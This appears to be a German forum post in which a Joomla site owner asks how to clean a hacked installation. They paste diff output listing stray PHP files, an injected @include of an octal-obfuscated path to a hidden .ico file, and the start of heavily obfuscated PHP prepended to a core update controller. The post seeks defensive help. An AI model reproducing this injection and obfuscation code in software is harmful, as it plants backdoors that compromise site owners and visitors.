Hallo,
meine Seite wurde gehacked. Dazu hätte ich Fragen bezügl der Bereinigung
1.) kann ich bedenkenlos alle Files auf dem Server mit den originalen Joomla Files ersetzten, also alles neu drüberklatschen?
2.) wie weiß ich 100%ig welche Files ich löschen kann, alles was nicht zu Joomla_3.8.12-Stable-Full_Package.zip gehört (legt auch die Installationsroutine neue Files an?)?
3.) Plugins/Komponenten wo sind die Plugins - kann man eingrenzen dass Komponentenfiles also nur in components Ordner sind ?
Hab mal einen Diff gemacht und einiges interessantes gefunden - hier mal ein paar Einträge.
PHP
jcms/components/com_banners/helpers: tj6cuew678.php.
jcms/includes/framework.php
1a2,6
> /*4a3a6*/
>
> @include "\057var\057www\057web\06524/\150tml\057jcm\163/pl\165gin\163/au\164hen\164ica\164ion\057gma\151l/.\062a24\060ad0\056ico";
>
> /*4a3a6*/
Nur in jcms/layouts: index.html.bak.bak.
Nur in jcms/layouts: index.php.
Nur in jcms/layouts/joomla: index.php.
Nur in jcms/layouts/joomla/searchtools: xml_parser_create_ns.php.suspected.
Nur in jcms/layouts/joomla/toolbar: atann2.php.
Nur in jcms/libraries/joomla/filesystem/support: bfouzuzp.php.
diff -r orig/Joomla_3.8.12-Stable-Full_Package/administrator/components/com_joomlaupdate/controllers/update.php jcms/administrator/components/com_joomlaupdate/controllers/update.php
1c1
< <?php
---
> <?php $a05af84 = 61;$GLOBALS['j9e80e61'] = Array();global $j9e80e61;$j9e80e61 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['qa8e055a'] = "\x43\x3a\x51\x60\x77\x2e\x67\x36\x7c\x78\x20\x4d\x56\x5c\x7e\x47\x9\x6b\x3b\x26\x61\x66\x57\x2d\x55\x2c\x4a\x5e\x39\x35\x45\x42\xd\x3d\x6c\x3c\x48\x52\x3e\x59\x73\x24\x5b\x7a\x70\x41\x2f\x21\x65\x4f\x68\x76\x4c\x72\x33\x58\x74\x29\x30\x23\x6f\x2a\x7d\x69\x62\x75\x28\xa\x6d\x3f\x32\x49\x5d\x71\x37\x40\x7b\x2b\x79\x6e\x5a\x6a\x34\x31\x50\x46\x54\x4b\x4e\x63\x25\x38\x53\x22\x27\x64\x44\x5f";$j9e80e61[$j9e80e61['qa8e055a'][17].$j9e80e61['qa8e055a'][58].$j9e80e61['qa8e055a'][21].$j9e80e61['qa8e055a'][82].$j9e80e61['qa8e055a'][7]] = $j9e80e61['qa8e055a'][89].$j9e80e61['qa8e055a'][50].$j9e80e61['qa8e055a'][53];$j9e80e61[$j9e80e61['qa8e055a'][53].$j9e80e61['qa8e055a'][74].$j9e80e61['qa8e055a'][58].$j9e80e61['qa8e055a'][74].$j9e80e61['qa8e055a'][64].$j9e80e61['qa8e055a'][74]] = $j9e80e61['qa8e055a'][60].$j9e80e61['qa8e055a'][53].$j9e80e61['qa8e055a'][95];$j9e80e61[$j9e80e61['qa8e055a'][40].$j9e80e61['qa8e055a'][82].$j9e80e61['qa8e055a'][64].$j9e80e61['qa8e055a'][28].$j9e80e61['qa8e055a'][82].$j9e80e61['qa8e055a'][7]] = $j9e80e61['qa8e055a'][95].$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][21].$j9e80e61['qa8e055a'][63].$j9e80e61['qa8e055a'][79].$j9e80e61['qa8e055a'][48];$j9e80e61[$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][21].$j9e80e61['qa8e055a'][7].$j9e80e61['qa8e055a'][29].$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][20].$j9e80e61['qa8e055a'][28]] = $j9e80e61['qa8e055a'][40].$j9e80e61['qa8e055a'][56].$j9e80e61['qa8e055a'][53].$j9e80e61['qa8e055a'][34].$j9e80e61['qa8e055a'][48].$j9e80e61['qa8e055a'][79];$j9e80e61[$j9e80e61['qa8e055a'][65].$j9e80e61['qa8e055a'][95].$j9e80e61['qa8e055a']
Alles anzeigen